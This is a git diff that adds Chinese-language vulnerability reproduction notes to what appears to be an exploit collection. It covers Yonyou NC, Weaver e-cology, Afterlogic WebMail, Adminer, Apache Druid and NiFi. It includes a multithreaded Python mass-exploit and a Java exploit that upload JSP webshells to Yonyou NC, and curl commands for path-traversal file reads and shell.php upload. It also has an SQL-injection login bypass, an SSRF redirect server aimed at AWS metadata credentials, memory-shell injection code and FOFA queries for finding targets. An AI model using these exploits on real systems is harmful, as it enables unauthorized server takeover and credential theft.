diff --git a/CMS漏洞/Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342.md b/CMS漏洞/Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342.md
new file mode 100644
index 0000000..a86b3f5
--- /dev/null
+++ b/CMS漏洞/Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342.md
@@ -0,0 +1,23 @@
+# Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342
+
+## 漏洞描述
+
+- https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt
+
+## FOFA
+
+```
+"Anchor CMS" && body="themes/default/img/favicon.png"
+```
+
+## 漏洞复现
+
+Anchor CMS使用Get方法进行敏感操作,可以使用exploit.html进行删除用户等操作。
+
+**exploit.html:**
+
+```html
+
+```
+
+当管理员点击时删除ID为21的用户。
\ No newline at end of file
diff --git a/OA产品漏洞/泛微OA E-cology KtreeUploadAction 任意文件上传.md b/OA产品漏洞/泛微OA E-cology KtreeUploadAction 任意文件上传.md
new file mode 100644
index 0000000..e6fb4a3
--- /dev/null
+++ b/OA产品漏洞/泛微OA E-cology KtreeUploadAction 任意文件上传.md
@@ -0,0 +1,45 @@
+# 泛微OA E-cology KtreeUploadAction 任意文件上传
+
+## 漏洞描述
+
+参考链接:
+
+- [泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s?__biz=MzkxMzIzNTU5Mg==&mid=2247483666&idx=1&sn=e70efe98c064e0f1df986e2b65c1a608&chksm=c1018af5f67603e39ce4d6e9375875e63e7b80633a1f99959f8d4652193ac3734765a99099ea&mpshare=1&scene=23&srcid=0414cqXy50udQOy19LYOMega&sharer_sharetime=1618332600979&sharer_shareid=d15208c7b27f111e2fe465f389ab6fac#rd)
+
+## 影响版本
+
+```
+目前已修复
+```
+
+## 漏洞复现
+
+定位文件:
+
+`ecology\CLASSB~1\com\weaver\formmodel\apps\ktree\servlet\KtreeUploadAction.class`
+
+exp:
+
+```
+
+POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=--------1638451160
+Content-Length: 171
+
+----------1638451160
+Content-Disposition: form-data; name="test"; filename="test.jsp"
+Content-Type: image/jpeg
+
+helloword
+----------1638451160--
+```
+
diff --git a/OA产品漏洞/泛微OA WorkflowServiceXml RCE.md b/OA产品漏洞/泛微OA E-cology WorkflowServiceXml RCE.md
similarity index 99%
rename from OA产品漏洞/泛微OA WorkflowServiceXml RCE.md
rename to OA产品漏洞/泛微OA E-cology WorkflowServiceXml RCE.md
index 499fd97..59c2d98 100644
--- a/OA产品漏洞/泛微OA WorkflowServiceXml RCE.md
+++ b/OA产品漏洞/泛微OA E-cology WorkflowServiceXml RCE.md
@@ -1,4 +1,4 @@
-# 泛微OA WorkflowServiceXml RCE
+# 泛微OA E-cology WorkflowServiceXml RCE
## 漏洞描述
diff --git a/OA产品漏洞/用友 NC FileReceiveServlet 反序列化RCE漏洞.md b/OA产品漏洞/用友 NC FileReceiveServlet 反序列化RCE漏洞.md
new file mode 100644
index 0000000..82a82ee
--- /dev/null
+++ b/OA产品漏洞/用友 NC FileReceiveServlet 反序列化RCE漏洞.md
@@ -0,0 +1,197 @@
+# 用友 NC FileReceiveServlet 反序列化RCE漏洞
+
+## 漏洞描述
+
+用友NC 存在反序列化 RCE漏洞,攻击者可利用控制服务器
+
+## 漏洞影响
+
+```
+用友NC 6.5
+```
+
+## FOFA
+
+```
+app="用友-UFIDA-NC"
+```
+
+## 漏洞复现
+
+首先从任意文件上传说起
+
+任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到,从请求中读取流,然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。
+
+
+
+而网上很多poc,大多都是基于此漏洞,利用反序列化上传一个文件到服务器。
+
+这也就是去年的那个任意文件上传的反序列化漏洞。但是,但是,这个漏洞本质是一个反序列化漏洞。而且某C的classpath中,也存在apache commonscollections库,我们可以利用这个库,直接执行命令或者内存马。岂不是比任意文件上传舒服多了。
+
+**内存马**
+
+老样子,在反序列化中想执行任意代码,一般都依靠xalan这个库。这次也不例外。
+
+植入内存马,关键在于我们怎样找到context,只有找到context,我们才可以添加filter。好在某c中,我们只需要通过下面的代码既可以获取当前context,不需要从tomcat中获取context
+
+```java
+ Object obj = 改动Locator.getInstance().lookup("ServletContext");
+ Field contextField = obj.getClass().getDeclaredField("context");
+ contextField.setAccessible(true);
+ obj = contextField.get(obj);
+ Field contextField1 = obj.getClass().getDeclaredField("context");
+ contextField1.setAccessible(true);
+ addFitlertoTomcat(contextField1.get(obj));
+```
+
+剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。
+
+
+
+**回显**
+
+我们只需要找到这样一个servlet,即存在反序列化的readObject,又将错误信息写入到response中
+
+不难看出 uploadServlet 就很满足这个需求。
+
+```plain
+out = new ObjectOutputStream(output);
+ in = new ObjectInputStream(request.getInputStream());
+ String dsName = (String)in.readObject();
+ }
+ } catch (Exception var14) {
+ var14.printStackTrace();
+ if (out == null) {
+ throw new ServletException(var14);
+ }
+
+ out.writeObject(var14);
+```
+
+如果出错的话,将错误信息通过序列化写入到response中。好处在于,我们不需要麻烦的去找tomcat的response对象。
+
+所以,我们将反序列化的payload,发送给uploadServlet即可。然后我们只需要读取响应,即可拿到服务器命令执行的回显结果。客户端代码可以这样写
+
+```java
+ ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r));
+ Exception e = (Exception) objectInputStream.readObject();
+ Object obj = e.getCause();
+ Field targetF = obj.getClass().getDeclaredField("target");
+ targetF.setAccessible(true);
+ obj = targetF.get(obj);
+ Field msgF = obj.getClass().getSuperclass().getDeclaredField("detailMessage");
+ msgF.setAccessible(true);
+ String msg = msgF.get(obj).toString();
+ System.out.println(msg);
+```
+
+### 文件上传EXP
+
+python exp:
+
+```
+import requests
+import threadpool
+import urllib3
+import sys
+import argparse
+
+urllib3.disable_warnings()
+proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
+header = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
+ "Content-Type": "application/x-www-form-urlencoded",
+ "Referer": "https://google.com",
+}
+
+def multithreading(funcname, filename="url.txt", pools=5):
+ works = []
+ with open(filename, "r") as f:
+ for i in f:
+ func_params = [i.rstrip("\n")]
+ works.append((func_params, None))
+ pool = threadpool.ThreadPool(pools)
+ reqs = threadpool.makeRequests(funcname, works)
+ [pool.putRequest(req) for req in reqs]
+ pool.wait()
+
+def wirte_targets(vurl, filename):
+ with open(filename, "a+") as f:
+ f.write(vurl + "\n")
+ return vurl
+
+def exp(u):
+ uploadHeader = {
+ "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
+ "Content-Type": "multipart/form-data;",
+ "Referer": "https://google.com"
+ }
+ uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"
+ shellFlag="t0test0ls"
+ uploadData+=shellFlag
+ try:
+ req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)
+ if req1.status_code == 200 :
+ req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)
+
+ if req3.text.index(shellFlag)>=0:
+ printFlag = "[Getshell]" + u+"/t00ls.jsp" + "\n"
+ print (printFlag)
+ wirte_targets(printFlag, "vuln.txt")
+ except :
+ pass
+ #print(printFlag, end="")
+
+
+if __name__ == "__main__":
+ if (len(sys.argv)) < 2:
+ print('useage : python' +str(sys.argv[0]) + ' -h')
+ else:
+ parser =argparse.ArgumentParser()
+ parser.description ='YONYOU UC 6.5 FILE UPLOAD!'
+ parser.add_argument('-u',help="url -> example http://127.0.0.1",type=str,dest='check_url')
+ parser.add_argument('-r',help="url list to file",type=str,dest='check_file')
+ args =parser.parse_args()
+ if args.check_url:
+ exp(args.check_url)
+
+ if(args.check_file):
+ multithreading(exp, args.check_file, 8)
+```
+
+java exp:
+
+```
+import java.io.*;
+import java.util.HashMap;
+import java.util.Map;
+
+public class App {
+ public static void main(String[] args) throws Exception {
+ String url="http://192.168.40.222";
+ Map metaInfo=new HashMap();
+ metaInfo.put("TARGET_FILE_PATH","webapps/nc_web");
+ metaInfo.put("FILE_NAME","cmd.jsp");
+ ByteArrayOutputStream baos=new ByteArrayOutputStream();
+ ObjectOutputStream oos=new ObjectOutputStream(baos);
+ oos.writeObject(metaInfo);
+ InputStream in=App.class.getResourceAsStream("cmd.jsp");
+ byte[] buf=new byte[1024];
+ int len=0;
+ while ((len=in.read(buf))!=-1){
+ baos.write(buf,0,len);
+ }
+ HttpClient.post(url+"/servlet/FileReceiveServlet",baos.toByteArray());
+ HttpResult result=HttpClient.get(url+"/cmd.jsp?cmd=echo+aaaaaa");
+ if(result.getData().contains("aaaaaa")){
+ System.out.println("shell路径:"+url+"/cmd.jsp?cmd=whoami");
+ }else{
+ System.out.println("上传shell失败或者漏洞不存在");
+ }
+ }
+}
+```
+
+## 参考文章
+
+https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w
\ No newline at end of file
diff --git a/OA产品漏洞/用友 NC 反序列化RCE漏洞.md b/OA产品漏洞/用友 NC 反序列化RCE漏洞.md
deleted file mode 100644
index 4fdbbcf..0000000
--- a/OA产品漏洞/用友 NC 反序列化RCE漏洞.md
+++ /dev/null
@@ -1,84 +0,0 @@
-# 用友 NC 反序列化RCE漏洞
-
-## 漏洞描述
-
-用友NC 存在反序列化 RCE漏洞,攻击者可利用控制服务器
-
-## 漏洞影响
-
-```
-用友 NC
-```
-
-## 漏洞复现
-
-首先从任意文件上传说起
-
-任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到,从请求中读取流,然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。
-
-
-
-而网上很多poc,大多都是基于此漏洞,利用反序列化上传一个文件到服务器。
-
-这也就是去年的那个任意文件上传的反序列化漏洞。但是,但是,这个漏洞本质是一个反序列化漏洞。而且某C的classpath中,也存在apache commonscollections库,我们可以利用这个库,直接执行命令或者内存马。岂不是比任意文件上传舒服多了。
-
-**内存马**
-
-老样子,在反序列化中想执行任意代码,一般都依靠xalan这个库。这次也不例外。
-
-植入内存马,关键在于我们怎样找到context,只有找到context,我们才可以添加filter。好在某c中,我们只需要通过下面的代码既可以获取当前context,不需要从tomcat中获取context
-
-```java
- Object obj = 改动Locator.getInstance().lookup("ServletContext");
- Field contextField = obj.getClass().getDeclaredField("context");
- contextField.setAccessible(true);
- obj = contextField.get(obj);
- Field contextField1 = obj.getClass().getDeclaredField("context");
- contextField1.setAccessible(true);
- addFitlertoTomcat(contextField1.get(obj));
-```
-
-剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。
-
-
-
-**回显**
-
-我们只需要找到这样一个servlet,即存在反序列化的readObject,又将错误信息写入到response中
-
-不难看出 uploadServlet 就很满足这个需求。
-
-```plain
-out = new ObjectOutputStream(output);
- in = new ObjectInputStream(request.getInputStream());
- String dsName = (String)in.readObject();
- }
- } catch (Exception var14) {
- var14.printStackTrace();
- if (out == null) {
- throw new ServletException(var14);
- }
-
- out.writeObject(var14);
-```
-
-如果出错的话,将错误信息通过序列化写入到response中。好处在于,我们不需要麻烦的去找tomcat的response对象。
-
-所以,我们将反序列化的payload,发送给uploadServlet即可。然后我们只需要读取响应,即可拿到服务器命令执行的回显结果。客户端代码可以这样写
-
-```java
- ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r));
- Exception e = (Exception) objectInputStream.readObject();
- Object obj = e.getCause();
- Field targetF = obj.getClass().getDeclaredField("target");
- targetF.setAccessible(true);
- obj = targetF.get(obj);
- Field msgF = obj.getClass().getSuperclass().getDeclaredField("detailMessage");
- msgF.setAccessible(true);
- String msg = msgF.get(obj).toString();
- System.out.println(msg);
-```
-
-## 参考文章
-
-https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w
\ No newline at end of file
diff --git a/Web应用漏洞/Adminer-SSRF漏洞 CVE-2021-21311.md b/Web应用漏洞/Adminer-SSRF漏洞 CVE-2021-21311.md
new file mode 100644
index 0000000..67da1ef
--- /dev/null
+++ b/Web应用漏洞/Adminer-SSRF漏洞 CVE-2021-21311.md
@@ -0,0 +1,87 @@
+# Adminer SSRF漏洞 CVE-2021-21311
+
+## 漏洞描述
+
+使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。
+
+参考链接:
+
+- https://github.com/advisories/GHSA-x5r2-hj5c-8jx6
+- https://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd
+
+## 漏洞复现
+
+首先,启动一个python服务器,该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下,重定向指向AWS元数据服务:
+
+```
+http://169.254.169.254/latest/meta-data/instance-id
+```
+
+然后,在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器,这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。
+
+
+
+
+重定向请求的python脚本:
+
+
+```py
+#!/usr/bin/env python
+
+import SimpleHTTPServer
+import SocketServer
+import sys
+import argparse
+
+def redirect_handler_factory(url):
+ """
+ Returns a request handler class that redirects to supplied `url`
+ """
+ class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
+ def do_GET(self):
+ self.send_response(301)
+ self.send_header('Location', url)
+ self.end_headers()
+
+ def do_POST(self):
+ self.send_response(301)
+ self.send_header('Location', url)
+ self.end_headers()
+
+ return RedirectHandler
+
+
+def main():
+
+ parser = argparse.ArgumentParser(description='HTTP redirect server')
+
+ parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
+ parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
+ parser.add_argument('redirect_url', action="store")
+
+ myargs = parser.parse_args()
+
+ redirect_url = myargs.redirect_url
+ port = myargs.port
+ host = myargs.ip
+
+ redirectHandler = redirect_handler_factory(redirect_url)
+
+ handler = SocketServer.TCPServer((host, port), redirectHandler)
+ print("serving at port %s" % port)
+ handler.serve_forever()
+
+if __name__ == "__main__":
+ main()
+
+```
+
+
+```
+http://169.254.169.254/latest/meta-data/iam/security-credentials/ //列出服务器的可用角色。
+```
+
+
+
+
+
diff --git a/Web应用漏洞/Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087.md b/Web应用漏洞/Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087.md
new file mode 100644
index 0000000..547c14f
--- /dev/null
+++ b/Web应用漏洞/Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087.md
@@ -0,0 +1,43 @@
+# Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087
+
+## 漏洞描述
+
+Adobe ColdFusion是一个快速应用程序开发平台。Adobe ColdFusion 存在远程代码执行漏洞,由于过滤不严,未经授权的攻击者可构造恶意请求,造成任意代码执行,控制服务器。建议相关用户尽快采取安全措施阻止漏洞攻击。
+
+参考链接:
+
+- https://nosec.org/home/detail/4707.html
+- https://github.com/projectdiscovery/nuclei-templates/pull/1128/files
+- https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
+
+## 漏洞影响
+
+```
+Adobe ColdFusion 2021 <= Version 2021.0.0.323925
+Adobe ColdFusion 2018 <= Update 10
+Adobe ColdFusion 2016 <= Update 16
+```
+
+## FOFA
+
+```
+app="Adobe-ColdFusion"
+```
+
+## 漏洞复现
+
+```
+ - method: GET
+ path:
+ - "{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
+ - "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
+
+regex:
+ - 'eval\(\"\(\"\+json\+\"\)\"\)'
+```
+
diff --git a/Web应用漏洞/Afterlogic Aurora & WebMail Pro 任意文件读取 CVE-2021-26294.md b/Web应用漏洞/Afterlogic Aurora & WebMail Pro 任意文件读取 CVE-2021-26294.md
new file mode 100644
index 0000000..b5f0049
--- /dev/null
+++ b/Web应用漏洞/Afterlogic Aurora & WebMail Pro 任意文件读取 CVE-2021-26294.md
@@ -0,0 +1,25 @@
+# Afterlogic Aurora & WebMail Pro 任意文件读取CVE-2021-26294
+
+## 漏洞描述
+
+攻击者可以通过caldav_public_user@localhost用户登录,不需要其它用户信息就可以读取配置文件从而获得敏感信息。
+
+参考链接:
+
+- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26294
+- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
+- https://forum.ywhack.com/thread-115326-1-8.html
+
+## 漏洞影响
+
+```
+WebMail Pro ≤ 7.7.9
+Afterlogic Aurora ≤ 7.7.9
+```
+
+## 漏洞复现
+
+```
+curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
+```
+
diff --git a/Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md b/Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md
new file mode 100644
index 0000000..f38709e
--- /dev/null
+++ b/Web应用漏洞/Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293.md
@@ -0,0 +1,33 @@
+# Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293
+
+## 漏洞描述
+
+该漏洞是由于Afterlogic Aurora & WebMail Pro中对上传的文件过滤和限制存在缺陷,攻击者可以通过上传恶意文件,从而执行任意代码。
+
+参考链接:
+
+- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26293
+- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md
+- https://forum.ywhack.com/thread-115325-1-8.html
+
+## 漏洞影响
+
+```
+WebMail Pro ≤ 7.7.9
+Afterlogic Aurora ≤ 7.7.9
+```
+
+## 漏洞复现
+
+```bash
+curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
+```
+
+默认路径为/var/www/html,也可能更改配置为其它路径,可以尝试其它方式获取。
+
+
+```bash
+curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
+//使用无效路径获取SabreDAV错误查看Webroot路径
+```
+
diff --git a/Web应用漏洞/images/16133787776790.jpg b/Web应用漏洞/images/16133787776790.jpg
new file mode 100644
index 0000000..6765f6c
Binary files /dev/null and b/Web应用漏洞/images/16133787776790.jpg differ
diff --git a/Web应用漏洞/images/16133787994051.jpg b/Web应用漏洞/images/16133787994051.jpg
new file mode 100644
index 0000000..37634d1
Binary files /dev/null and b/Web应用漏洞/images/16133787994051.jpg differ
diff --git a/Web应用漏洞/员工管理系统 Employee Management System 1.0 身份验证绕过.md b/Web应用漏洞/员工管理系统 Employee Management System 1.0 身份验证绕过.md
new file mode 100644
index 0000000..d5d37a3
--- /dev/null
+++ b/Web应用漏洞/员工管理系统 Employee Management System 1.0 身份验证绕过.md
@@ -0,0 +1,49 @@
+# 员工管理系统 Employee Management System 1.0 身份验证绕过
+
+## 漏洞描述
+
+漏洞发现时间:2020-10-16
+
+软件下载地址:https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
+
+验证环境:Windows 10 + xampp v3.2.4
+
+参考链接:
+
+- https://www.exploit-db.com/exploits/48882
+
+## 漏洞复现
+
+打开网址:
+
+```
+http://localhost:8081/Employee%20Management%20System/alogin.html
+```
+
+通过payload绕过验证:
+
+```
+anki' or 1=1#
+```
+
+发送请求:
+
+```
+POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1
+Host: localhost:8081
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 70
+Origin: http://localhost:8081
+Connection: close
+Referer: http://localhost:8081/Employee%20Management%20System/alogin.html
+Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
+Upgrade-Insecure-Requests: 1
+
+mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login
+```
+
+将以Admin身份登录应用
\ No newline at end of file
diff --git a/Web应用漏洞/金山 V8 V9 终端安全系统 文件上传漏洞.md b/Web应用漏洞/金山 V8 V9 终端安全系统 文件上传漏洞.md
new file mode 100644
index 0000000..7369469
--- /dev/null
+++ b/Web应用漏洞/金山 V8 V9 终端安全系统 文件上传漏洞.md
@@ -0,0 +1,21 @@
+# 金山 V8 V9 终端安全系统 文件上传漏洞
+
+## 漏洞描述
+
+参考链接:
+
+- https://forum.butian.net/share/76
+
+## 漏洞复现
+
+在tools目录下的mange下存在一个upload.php。该文件可导致任意文件上传。
+
+poc:
+
+```
+POST /tools/manage/upload.php HTTP/1.1
+HOST: target
+...
+
+```
+
diff --git a/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md b/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md
new file mode 100644
index 0000000..e0033f6
--- /dev/null
+++ b/Web应用漏洞/阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592.md
@@ -0,0 +1,22 @@
+# 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592
+
+## 漏洞描述
+
+阿里巴巴otter manager分布式数据库同步系统是基于数据库增量日志解析,准实时同步到本机房或异地机房的mysql/oracle数据库,一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞,攻击者可利用漏洞获取zookper信息。
+
+参考链接:
+
+* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592
+* https://forum.ywhack.com/thread-115309-1-8.html
+
+## FOFA
+
+```
+title="Otter Manager"
+```
+
+## 漏洞复现
+
+默认口令:`admin/admin`
+
+进入后直接f12查看元素,修改password为text即可查看数据库等敏感信息密码。
\ No newline at end of file
diff --git a/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md b/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md
index b02ae8c..3e02cb1 100644
--- a/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md
+++ b/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-25646.md
@@ -4,7 +4,15 @@
Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。
Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。
-Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码
+Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。
+
+参考链接:
+
+* https://github.com/apache/druid/issues/2434
+* https://forum.ywhack.com/thread-115083-1-1.html
+* https://druid.apache.org/docs/latest/operations/api-reference.html#broker
+* https://lists.apache.org/thread.html/r20e0c3b10ae2c05a3aad40f1476713c45bdefc32c920b9986b941d8f@%3Cannounce.apache.org%3E
+* https://www.o2oxy.cn/3090.html
## 漏洞影响
diff --git a/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-26919.md b/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-26919.md
new file mode 100644
index 0000000..da84916
--- /dev/null
+++ b/Web服务器漏洞/Apache Druid 远程代码执行漏洞 CVE-2021-26919.md
@@ -0,0 +1,29 @@
+# Apache Druid 远程代码执行漏洞 CVE-2021-26919
+
+## 漏洞描述
+
+Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。2021年3月30日,Apache Druid官方发布安全更新,修复了 CVE-2021-26919 Apache Druid 远程代码执行漏洞。由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。
+
+参考链接:
+
+* http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
+* https://help.aliyun.com/noticelist/articleid/1060822985.html
+
+## 漏洞影响
+
+```
+Apache Druid < 0.20.2
+```
+
+## 漏洞复现
+
+jdbc触发点:https://druid.apache.org/docs/0.19.0/development/extensions-core/druid-lookups.html#polling-lookup
+
+poc:
+
+```
+url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&maxAllowedPacket=65535"
+user ="cb1"
+password="password"
+```
+
diff --git a/Web服务器漏洞/Apache NiFi Api 远程代码执行 RCE.md b/Web服务器漏洞/Apache NiFi Api 远程代码执行 RCE.md
new file mode 100644
index 0000000..660bf6a
--- /dev/null
+++ b/Web服务器漏洞/Apache NiFi Api 远程代码执行 RCE.md
@@ -0,0 +1,126 @@
+# Apache NiFi Api 远程代码执行 RCE
+
+## 漏洞描述
+
+Apache NiFi是Apache Software Foundation的一个软件项目,旨在使软件系统之间的数据流自动化。
+
+参考链接:
+
+- https://twitter.com/chybeta/status/1333341820596568065
+- https://github.com/imjdl/Apache-NiFi-Api-RCE
+- https://forum.ywhack.com/thread-114763-1-3.html
+
+## FOFA
+
+```
+"nifi" && title=="NiFi"
+```
+
+## 漏洞复现
+
+exp:
+
+```python
+import sys
+import json
+import requests as req
+
+
+class Exp:
+ def __init__(self, url):
+ self.url = url
+
+ def check_is_vul(self):
+ url = self.url + "/nifi-api/access/config"
+ try:
+ res = req.get(url=url, verify=False)
+ data = res.json()
+ return not data["config"]["supportsLogin"]
+ except Exception as e:
+ pass
+ return False
+
+ def clean_up(self, p_id):
+ url = self.url + "/nifi-api/processors/" + p_id + "/run-status"
+ data = {'revision': {'clientId': 'x', 'version': 1}, 'state': 'STOPPED'}
+ req.put(url=url, data=json.dumps(data), verify=False)
+ req.delete(url + "/threads", verify=False)
+
+ def exploit(self, cmd):
+ g_id = self.fetch_process_group()
+ if g_id:
+ p_id = self.create_process(g_id)
+ if p_id:
+ self.run_cmd(p_id=p_id, cmd=cmd)
+ self.clean_up(p_id=p_id)
+
+ def run_cmd(self, p_id, cmd):
+ url = self.url + "/nifi-api/processors/" + p_id
+ cmd = cmd.split(" ")
+ data = {
+ 'component': {
+ 'config': {
+ 'autoTerminatedRelationships': ['success'],
+ 'properties': {
+ 'Command': cmd[0],
+ 'Command Arguments': " ".join(cmd[1:]),
+ },
+ 'schedulingPeriod': '3600 sec'
+ },
+ 'id': p_id,
+ 'state': 'RUNNING'
+ },
+ 'revision': {'clientId': 'x', 'version': 1}
+ }
+ print(data)
+ headers = {
+ "Content-Type": "application/json",
+ }
